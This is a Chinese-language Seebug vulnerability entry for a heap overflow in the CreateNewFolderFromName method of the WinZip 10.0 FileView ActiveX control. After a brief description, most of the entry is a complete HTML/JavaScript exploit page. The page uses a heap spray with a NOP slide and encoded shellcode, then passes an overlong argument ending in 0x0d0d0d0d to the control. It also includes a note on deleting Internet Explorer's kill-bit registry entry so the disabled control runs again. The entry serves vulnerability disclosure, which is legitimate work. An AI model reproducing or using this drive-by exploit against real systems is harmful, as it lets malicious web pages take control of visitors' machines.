WinZip FileView ActiveX控件CreateNewFolderFromName方法缓冲区溢出漏洞

2007-01-04T00:00:00
ID SSV:1088
Type seebug
Reporter Root
Modified 2007-01-04T00:00:00

Description

WinZip是一款流行的文件压缩/解压工具。

WinZip的FileView ActiveX控件(WZFILEVIEW.FileViewCtrl.61,CLSID为A09AE68F-B14D-43ED-B713- BA413F034904)中存在堆溢出漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意指令。

WinZip FileView ActiveX控件的CreateNewFolderFromName方法在处理超长畸形的参数时存在堆溢出漏洞,远程攻击者可能利用此漏洞通过诱使用户点击访问恶意的网页来控制用户的机器。

WinZip WinZip 10.0 Build 6667 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

<a href="http://www.winzip.com" target="_blank">http://www.winzip.com</a>

                                        
                                            
                                                
&lt;/body&gt;
&lt;/html&gt;
&lt;head&gt;
&lt;object classid=&quot;clsid:{A09AE68F-B14D-43ED-B713-BA413F034904}&quot; id=&quot;winzip&quot;&gt;
&lt;/object&gt;
&lt;/head&gt;

&lt;body&gt;

&lt;SCRIPT language=&quot;javascript&quot;&gt;
   /*
   ---===[ winzip-exploit.html
   
     Xiao Hui : 76693223[at]163.com
     HomePage: www.nipc.org.cn
     (c) 2006 All rights reserved.
     note:Because of the prior vuln in FileView ActiveX Control,Micorsoft has disabled \
this ActiveX Controls, To test this vuln,You can delete the key:
         [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX \
Compatibility\{A09AE68F-B14D-43ED-B713-BA413F034904}] &quot;Compatibility \
           Flags&quot;=dword:00000400
      I have test the exploit on Windows 2000+sp4(CN) and Windows xp+sp2(CN) and \
Winzip 10.0(6667),you can try other version,goodluck~ ]===---
*/

var heapSprayToAddress = 0x0d0d0d0d;

   var payLoadCode = unescape(&quot;%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5 \
F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u042 \
4%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031% \
u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5 \
F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u006 \
3&quot;);

   var heapBlockSize = 0x400000;

   var payLoadSize = payLoadCode.length * 2;

   var spraySlideSize = heapBlockSize - (payLoadSize+0x38);

   var spraySlide = unescape(&quot;%u9090%u9090&quot;);
   spraySlide = getSpraySlide(spraySlide,spraySlideSize);

   heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;

   memory = new Array();

   for (i=0;i&lt;heapBlocks;i++)
   {
     memory[i] = spraySlide + payLoadCode;
   }
   

   var xh = 'A';
   while (xh.length &lt; 231) xh+='A';
   xh+=&quot;\x0d\x0d\x0d\x0d&quot;;
   winzip.CreateNewFolderFromName(xh);
   function getSpraySlide(spraySlide, spraySlideSize)
   {
     while (spraySlide.length*2&lt;spraySlideSize)
     {
        spraySlide += spraySlide;
     }
     spraySlide = spraySlide.substring(0,spraySlideSize/2);
     return spraySlide;
   }
   
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;